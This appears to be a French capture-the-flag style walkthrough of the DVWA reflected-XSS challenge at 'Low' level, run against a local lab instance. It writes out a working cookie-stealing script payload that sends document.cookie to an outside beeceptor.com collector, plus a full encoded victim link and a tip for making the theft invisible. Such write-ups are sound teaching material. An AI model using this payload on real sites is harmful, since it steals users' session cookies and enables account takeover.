# Niveau "Low"

Sur ce challenge, un simple formulaire permettant de saisir son nom :

![](https://1502624390-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LXA-aPG-dBFXBTzP1DC%2F-Ltxo6Ie8uKuo6rrL2md%2F-LtxpIBJP4uac8HcBo_1%2Fbbf16dde4020a8d2d1fe14407f9a86a6.png?alt=media\&token=770f1de2-687f-446d-84b2-8a176fba4fc8)

Le paramètre **`GET`** nommé `name` est simplement réfléchi sur la page :

![](https://1502624390-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LXA-aPG-dBFXBTzP1DC%2F-Ltxo6Ie8uKuo6rrL2md%2F-LtxplV-NHf6N6iPWJMQ%2F0f1ab9498e89d4b6ab5e5aad787c2e10.png?alt=media\&token=8e4be50c-ebcc-4545-9276-65bda50ef56f)

Je tente une simple `alert()` box  :

![](https://1502624390-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LXA-aPG-dBFXBTzP1DC%2F-LtxpxEdekurpKcDnBPI%2F-LtxsgmIpnMPbFp4Jy0U%2Ff3a8c7198442aeed07b360f1edb5fd49.png?alt=media\&token=2dbab675-289e-41c6-a9d4-851b7c36db3a)

Il ne reste plus qu'a forger un lien exécutant un script envoyant les cookies de la victime sur un serveur malicieux :

```javascript
<script>document.write('<img src="https://dvwaxssrefl.free.beeceptor.com?cookie=' + document.cookie + '" />')</script>
```

![](https://1502624390-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LXA-aPG-dBFXBTzP1DC%2F-LtxpxEdekurpKcDnBPI%2F-Ltxu1pOlNPysKKT1gXS%2Fbf16bb33a4bc0fb6c35065e43d4c62be.png?alt=media\&token=3d1a3caa-cc9a-4fd2-b5fe-89cea0e47396)

L'URL complète à soumettre à la victime est :

```http
http://192.168.56.203:8080/vulnerabilities/xss_r/?name=%3Cscript%3Edocument.write%28%27%3Cimg+src%3D%22https%3A%2F%2Fdvwaxssrefl.free.beeceptor.com%3Fcookie%3D%27+%2B+document.cookie+%2B+%27%22+%2F%3E%27%29%3C%2Fscript%3E
```

L'exécution de la payload sera invisible pour la victime (concernant l'icone de l'image, il suffira de renseigner une taille à 0) :

![](https://1502624390-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LXA-aPG-dBFXBTzP1DC%2F-LtxpxEdekurpKcDnBPI%2F-LtxupSX3dxU_g9KorFu%2F72061dc6e01cd1e4dec722d83662e405.png?alt=media\&token=de93e66e-b107-48e8-880a-a9b4d42f3b59)

Côté attaquant, je reçois la valeur des cookies lors du chargement de l'image (par la victime) :

![](https://1502624390-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LXA-aPG-dBFXBTzP1DC%2F-LtxpxEdekurpKcDnBPI%2F-Ltxv6zRbCk-D_H2j4ix%2Ff07926511e14747e755e5538516e2c02.png?alt=media\&token=ffb9a4d6-b941-466f-9869-167524ff68b1)

{% hint style="info" %}
J'utilise ici le service [beeceptor.com](https://beeceptor.com/) mais il est bien sur possible d'utiliser son propre serveur malicieux à partir du moment qu'il est possible de visualiser les requêtes effectuées
{% endhint %}
